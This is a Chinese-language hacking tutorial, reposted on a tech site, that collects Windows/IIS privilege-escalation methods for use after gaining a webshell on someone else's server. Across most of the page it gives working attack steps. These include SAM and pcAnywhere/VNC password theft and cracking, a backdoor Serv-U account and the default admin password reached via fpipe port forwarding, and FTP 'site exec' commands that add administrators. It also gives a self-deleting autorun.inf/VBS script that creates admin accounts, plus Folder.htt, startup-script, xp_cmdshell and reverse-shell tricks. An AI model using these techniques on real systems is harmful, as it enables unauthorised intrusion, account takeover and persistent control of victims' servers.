最全的Webshell提权方法总结

来源:互联网 发布:网络推广 photoshop 编辑:程序博客网 时间:2024/06/06 01:59

在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用。

AD:2014WOT全球软件技术峰会北京站 课程视频发布

在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用。

WEBSHELL权限提升技巧  
c: d: e:.....  
C:\Documents and Settings\All Users\「开始」菜单\程序\  
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  
c:\Program Files\serv-u\  
C:\WINNT\system32\config\  
下它的SAM,破解密码  
c:\winnt\system32\inetsrv\data\  
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行  
c:\prel  
C:\Program Files\Java Web Start\  
c:\Documents and Settings\  
C:\Documents and Settings\All Users\  
c:\winnt\system32\inetsrv\data\  
c:\Program Files\  
c:\Program Files\serv-u\ BBS.bitsCN.com国内最早的网管论坛  
C:\Program Files\Microsoft SQL Server\  
c:\Temp\  
c:\mysql\(如果服务器支持PHP)  
c:\PHP(如果服务器支持PHP)  
运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限  
还可以用这段代码试提升,好象不是很理想的  
如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。  
根目录下隐藏autorun.inf  
C:\PROGRAM FILES\KV2004\ 绑  
D:\PROGRAM FILES\RISING\RAV\  
C:\Program Files\Real\RealServer\  
rar  
Folder.htt与desktop.ini  
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下  
replace 替换法 捆绑  
脚本 编写一个启动/关机脚本 重起  
删SAM :( 错  
CAcls命令  
FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak  
Ring的权限提升21大法!  
以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过  
的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助! 

1.radmin连接法  
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去  。本人从来米成功过,端口到是给对方打开了。

2.paanywhere  
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF  
文件,在本地安装pcanywhere上去 

3.SAM破解  
C:\WINNT\system32\config\ 下他的SAM 破解之  

4.SU密码夺取  
C:\Documents and Settings\All Users\「开始」菜单\程序\  
引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转  
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空  
[USER=WekweN|1]  
Password=  
HomeDir=c:\  
TimeOut=600  
Maintenance=System  
Access1=C:\|RWAMELCDP  
Access1=d:\|RWAMELCDP  
Access1=f:\|RWAMELCDP  
SKEYvalues=  
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 

5.c:\winnt\system32\inetsrv\data\  
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,  
然后执行 

6.SU溢出提权  
这个网上教程N多 不详细讲解了 

7.运行Csript  
引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提  
升权限  
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps  
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll  
再将asp.dll加入特权一族  
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)  
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"  
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"  
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32  
\inetsrv\asp.dll"  
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

8.脚本提权  
c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs 

9.VNC  
这个是小花的文章 HOHO  
默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password 

我们可以用vncx4  
破解它,vncx4使用很简单,只要在命令行下输入  
c:\>vncx4 -W  
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。

10.NC提权  
给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了 

11.社会工程学之GUEST提权  
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮  
箱号 手机号 尽量看看 HOHO 

12.IPC空连接  
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令 

13.替换服务  
这个不用说了吧?个人感觉相当复杂 

14.autorun .inf  
autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信  
他不运行 

15.desktop.ini与Folder.htt  
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义  
文件夹"(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder  
setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后  
我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名">  
然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方  
任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门 

16.su覆盖提权  
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重  
起一下Serv-U,于是你上面的所有配置都与他的一模一样了 

17.SU转发端口  
43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe –v –l 3333 –r  
43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个  
服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的  
Serv-u了 

18.SQL帐户密码泄露  
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的  
ASP文件中看到),因为MSSQL是默认的SYSTEM权限。  
引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass DL.bitsCN.com网管软件下载  
中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect,连接上后就可  
以在CMD一栏中输入你想要的CMD命令了 

19.asp.dll  
引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同  
 
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"  
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"  
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32  
\inetsrv\asp.dll"  
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去  
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到  
C:\Inetpub\AdminScripts>这个目录下.  
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把  
asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东. 

20.Magic Winmail  
前提是你要有个webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧 

21.DBO……  
其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底!  
感谢noangel  
WEBSHELL权限提升  
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容  
OK,进入我的WEBSHELL  
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊  
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了

一 serv-u提升  
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21  
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了  
上传FPIPE,端口转发工具, 图三  
在运行CMD命令里输入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口 

然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的 81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator 密码:#l@$ak#.lk;0@P (密码都是字母)  
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录  
接下来就是登陆了,登陆FTP一定要在CMD下登陆,  
进入后一般命令和DOS一样,添加用户的时候  
ftp>quote site exec net.exe user hk pass /add  
ftp>quote site exec net.exe localgroup administrators hk/add  
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具  
二  
auto.ini 加 SHELL.VBS  
autorun.inf  
[autorun]  
open=shell.vbs  
shell.vbs  
dim wsh  
set wsh=createObject("WScript.Shell")  
wsh.run "net user guest /active:yes",0  
wsh.run "net user guest 520ls",0  
wsh.run "net localgroup administrators guest /add",0  
wsh.run "net user hkbme 520ls /add",0 


wsh.run "net localgroup administrators hkbme /add",0  
wsh.run "cmd.exe /c del autorun.inf",0  
wsh.run "cmd.exe /c del shell.vbs",0 

但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序 

三  
Folder.htt与desktop.ini  
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个  
Folder.htt添加代码  
  
  
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上 

四  
replace  
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点 www.bitsCN.net网管博客等你来搏 
格式  
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]  
[/R] [/W]  
REPLACE [drive1:][path1]filename [drive2:][path2]  
[/R] [/S] [/W]  
 [drive1:][path1]filename 指定源文件。  
 [drive2:][path2] 指定要替换文件的  
  目录。  
 /A 把新文件加入目标目录。不能和  
  /S 或 /U 命令行开关搭配使用。  
 /P 替换文件或加入源文件之前会先提示您  
  进行确认。  
 /R 替换只读文件以及未受保护的  
  文件。  
 /S 替换目标目录中所有子目录的文件。  
  不能与 /A 命令选项  
  搭配使用。  
 /W 等您插入磁盘以后再运行。  
 /U 只会替换或更新比源文件日期早的文件。  
  不能与 /A 命令行开关搭配使用  
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下 

五  
脚本  
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:  
[Startup] 


0CmdLine=a.bat  
0Parameters=  
将文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"  
A.BAT的内容可以是NET USER yonghu mima  
也可以是NET USER ADMINistrator XXX  
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限

六  
SAM  
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空 
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换。

0 0